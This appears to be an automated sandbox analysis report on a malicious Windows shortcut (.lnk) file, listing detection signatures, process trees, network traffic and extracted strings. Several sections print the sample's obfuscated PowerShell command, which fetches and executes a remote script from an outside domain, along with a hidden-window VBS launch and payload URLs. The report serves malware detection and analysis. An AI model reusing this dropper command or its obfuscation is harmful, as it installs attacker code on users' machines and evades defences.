Windows Analysis Report
0bNBLjPn56.lnk

Overview

General Information

Sample name: 0bNBLjPn56.lnk (renamed because original name is a hash value)
Original sample name: 18606c684a9f169298350be1dc11f222d27c68789953f78d0feedfea90d07c53.lnk
Analysis ID: 1578187
MD5: 898a7ff6f3cc5cc4f216687d30dac587
SHA1: 9f47ae1aae02b3b1a8b4481b755027f78db2d68f
SHA256: 18606c684a9f169298350be1dc11f222d27c68789953f78d0feedfea90d07c53
Tags: 185-236-228-92, 87-120-112-91, lnk, www-al-rasikh-com, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
AI detected suspicious sample
Machine Learning detection for sample
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • powershell.exe (PID: 2744 cmdline: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')) MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 7932 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 8136 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 3136 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1760,i,5841402874270245853,5687332266173655936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 5648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 2744, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
Source: amsi64_2744.amsi.csv, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security

      System Summary

      Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp), Data: Command: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), CommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), ProcessId: 2744, ProcessName: powershell.exe
      Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", ProcessId: 7552, ProcessName: powershell.exe
      Source: File created, Author: Florian Roth (Nextron Systems), Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2744, TargetFilename: C:\Users\Public\iys.vbs
      Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2744, TargetFilename: C:\Users\Public\iys.vbs
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), CommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), ProcessId: 2744, ProcessName: powershell.exe
      Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5648, ProcessName: svchost.exe
      No Suricata rule has matched


      AV Detection

      Source: 0bNBLjPn56.lnk, Avira: detected
      Source: 0bNBLjPn56.lnk, Virustotal: Detection: 25%
      Source: 0bNBLjPn56.lnk, ReversingLabs: Detection: 28%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.0% probability
      Source: 0bNBLjPn56.lnk, Joe Sandbox ML: detected
      Source: unknown, HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49721 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49738 version: TLS 1.2
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2269740507.0000027DEE1D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2269229094.0000027DEDF4F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbe35 source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2353829592.0000026B1BAD5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbP%tn source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEDFEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbbP source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEE015000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb# source: powershell.exe, 00000002.00000002.2451470735.0000026B35E4E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEE015000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbk source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbment.Automation.pdbn# source: powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb= source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: global traffic, HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1, Host: www.astenterprises.com.pk, Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1, Host: www.bluemaxxlaser.com, Connection: Keep-Alive
      Source: Joe Sandbox View, IP Address: 203.175.174.69
      Source: Joe Sandbox View, IP Address: 107.161.23.150
      Source: Joe Sandbox View, ASN Name: RAMNODEUS
      Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global traffic, HTTP traffic detected: GET /ms/neaters.txt HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682, Host: www.al-rasikh.com, Connection: Keep-Alive
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic, DNS traffic detected: DNS query: www.al-rasikh.com
      Source: global traffic, DNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global traffic, DNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global traffic, DNS traffic detected: DNS query: x1.i.lencr.org
      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Date: Thu, 19 Dec 2024 10:56:22 GMT, Server: Apache, Content-Length: 315, Keep-Alive: timeout=5, max=100, Connection: Keep-Alive, Content-Type: text/html; charset=iso-8859-1, Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F041000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://al-rasikh.com
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F902000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://astenterprises.com.pk
      Source: svchost.exe, 0000000B.00000002.3460852336.000001EA0D400000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.ver)
      Source: qmgr.db.11.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.11.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
      Source: qmgr.db.11.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.11.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.11.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.11.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.11.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: qmgr.db.11.dr, String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DB48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1D991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5EB5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F041000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.al-rasikh.com
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F902000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F978000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F978000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F0C2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.blujlqmaxxlasjlqr.com/ms/ms.
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F074000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F0C2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.blujlqmaxxlasjlqr.com/ms/ms.vbsX
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.10.dr, String found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1D991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5E8E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
      Source: qmgr.db.11.dr, String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 0000000B.00000003.2347057711.000001EA0D2C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DB48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.al-rasikh.com
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.al-rasikh.com/ms/nea
      Source: powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp, 0bNBLjPn56.lnk, String found in binary or memory: https://www.al-rasikh.com/ms/neaters.txt
      Source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2386989031.0000026B1BC60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2353829592.0000026B1BADE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2387303760.0000026B1BCD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2449512152.0000026B35B4E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2451470735.0000026B35E75000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.al-rasikh.com/ms/neaters.txt-UseBasicParsing
      Source: powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.al-rasikh.com/ms/neaters.txt4p
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.al-rasikh.com/ms/neaters.txtP
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf8
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknown, Network traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknown, Network traffic detected: HTTP traffic on port 49738 -> 443

      System Summary

      Source: 0bNBLjPn56.lnk, LNK file: ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing'))
      Source: C:\Windows\System32\svchost.exe, File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_00007FFD33FA4CFA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_00007FFD33FA73D1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_00007FFD33FA2BF8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_00007FFD33FA6852
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_00007FFD34079C6D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_00007FFD34070899
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_00007FFD34072F09
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_00007FFD3407199D
      Source: classification engine, Classification label: mal100.evad.winLNK@20/58@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\Desktop\List of Required items and services.pdf
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dinjlwzf.pvg.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing'))
